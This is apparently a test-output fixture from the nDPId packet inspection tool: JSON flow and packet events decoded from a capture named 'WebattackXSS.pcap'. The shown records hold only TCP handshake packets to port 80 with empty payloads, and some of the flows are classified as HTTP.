+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3349,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347370339,"flow_last_seen":1499347370339,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347370339,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56468,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3349,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":1,"flow_last_seen":1499347370339,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347370339,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iG5AAD4GPWKsEAABwKgKMtyUAFBZvPlKAAAAAKACchC8uQAAAgQFtAQCCAoBOnEkAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":2,"flow_last_seen":1499347370339,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347370339,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3JQ4r3KfWbz5S6AScSDLywAAAgQFtAQCCAoD5EKaATpxJAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3352,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":3,"flow_last_seen":1499347370340,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347370340,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iG9AAD4GPWmsEAABwKgKMtyUAFBZvPlLOK9yoIAQAOVq0wAAAQEICgE6cSQD5EKa"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3361,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347371602,"flow_last_seen":1499347371602,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347371602,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3361,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":1499347371602,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347371602,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jiZAAD4GN6qsEAABwKgKMtyiAFAEW\/xGAAAAAKACchAN1QAAAgQFtAQCCAoBOnJgAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3362,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":2,"flow_last_seen":1499347371602,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347371602,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3KLBqaHpBFv8R6AScSBjZgAAAgQFtAQCCAoD5EPWATpyYAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3363,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":3,"flow_last_seen":1499347371603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347371603,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jidAAD4GN7GsEAABwKgKMtyiAFAEW\/xHwamh6oAQAOUCbgAAAQEICgE6cmAD5EPW"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3379,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347374136,"flow_last_seen":1499347374136,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374136,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3379,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":1499347374136,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347374136,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DktAAD4Gt4WsEAABwKgKMty8AFAnfHqSAAAAAKACchBp1QAAAgQFtAQCCAoBOnTZAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":2,"flow_last_seen":1499347374136,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347374136,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3LxHeFJ\/J3x6k6AScSCGiQAAAgQFtAQCCAoD5EZPATp02QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3381,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":3,"flow_last_seen":1499347374137,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347374137,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DkxAAD4Gt4ysEAABwKgKMty8AFAnfHqTR3hSgIAQAOUlkAAAAQEICgE6dNoD5EZP"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347239517,"flow_last_seen":1499347244683,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55078,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347239517,"flow_last_seen":1499347244683,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55078,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347240786,"flow_last_seen":1499347246684,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55092,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347240786,"flow_last_seen":1499347246684,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55092,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347243333,"flow_last_seen":1499347248684,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55118,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347243333,"flow_last_seen":1499347248684,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55118,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347244580,"flow_last_seen":1499347249685,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55132,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347244580,"flow_last_seen":1499347249685,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55132,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347247114,"flow_last_seen":1499347252685,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55158,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347247114,"flow_last_seen":1499347252685,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347248373,"flow_last_seen":1499347253687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55172,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347248373,"flow_last_seen":1499347253687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347249651,"flow_last_seen":1499347254687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55186,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347249651,"flow_last_seen":1499347254687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55186,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3391,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347375388,"flow_last_seen":1499347375388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347375388,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3391,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":1499347375388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347375388,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VfhAAD4Gb9isEAABwKgKMtzKAFDNpCPqAAAAAKACchAZDgAAAgQFtAQCCAoBOnYSAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3392,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":2,"flow_last_seen":1499347375388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347375388,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3MqX5dxFzaQj66AScSBaVQAAAgQFtAQCCAoD5EeIATp2EgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3393,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":3,"flow_last_seen":1499347375389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347375389,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VflAAD4Gb9+sEAABwKgKMtzKAFDNpCPrl+XcRoAQAOX5WwAAAQEICgE6dhMD5EeI"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3404,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347376638,"flow_last_seen":1499347376638,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347376638,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3404,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":1,"flow_last_seen":1499347376638,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347376638,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8EqdAAD4GsymsEAABwKgKMtzYAFCvXmXsAAAAAKACchD0CgAAAgQFtAQCCAoBOndLAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3405,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":2,"flow_last_seen":1499347376639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347376639,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3NhWyE7Mr15l7aAScSACsAAAAgQFtAQCCAoD5EjBATp3SwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3406,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":3,"flow_last_seen":1499347376639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347376639,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0EqhAAD4GszCsEAABwKgKMtzYAFCvXmXtVshOzYAQAOWhtwAAAQEICgE6d0sD5EjB"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3422,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347379171,"flow_last_seen":1499347379171,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347379171,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56562,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3422,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":1499347379171,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347379171,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NzVAAD4GjpusEAABwKgKMtzyAFA14k7xAAAAAKACchCB7wAAAgQFtAQCCAoBOnnEAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3423,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":2,"flow_last_seen":1499347379171,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347379171,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3PK2Txs5NeJO8qAScSBiJwAAAgQFtAQCCAoD5Es6ATp5xAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3424,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":3,"flow_last_seen":1499347379172,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347379172,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NzZAAD4GjqKsEAABwKgKMtzyAFA14k7ytk8bOoAQAOUBLwAAAQEICgE6ecQD5Es6"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3434,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347380424,"flow_last_seen":1499347380424,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347380424,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56576,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3434,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":1499347380424,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347380424,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8PTxAAD4GiJSsEAABwKgKMt0AAFCXo0fBAAAAAKACchAmFwAAAgQFtAQCCAoBOnr9AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3435,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":2,"flow_last_seen":1499347380424,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347380424,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3QDrAYLNl6NHwqAScSBozwAAAgQFtAQCCAoD5ExzATp6\/QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3436,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":3,"flow_last_seen":1499347380425,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347380425,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0PT1AAD4GiJusEAABwKgKMt0AAFCXo0fC6wGCzoAQAOUH1wAAAQEICgE6ev0D5Exz"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3446,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347381694,"flow_last_seen":1499347381694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347381694,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56590,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3446,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":1,"flow_last_seen":1499347381694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347381694,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Vu9AAD4GbuGsEAABwKgKMt0OAFBD4SrUAAAAAKACchCVegAAAgQFtAQCCAoBOnw7AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3447,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":2,"flow_last_seen":1499347381694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347381694,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3Q7aUZP1Q+Eq1aAScSDWfAAAAgQFtAQCCAoD5E2xATp8OwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3448,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":3,"flow_last_seen":1499347381694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347381694,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VvBAAD4GbuisEAABwKgKMt0OAFBD4SrV2lGT9oAQAOV1hAAAAQEICgE6fDsD5E2x"} 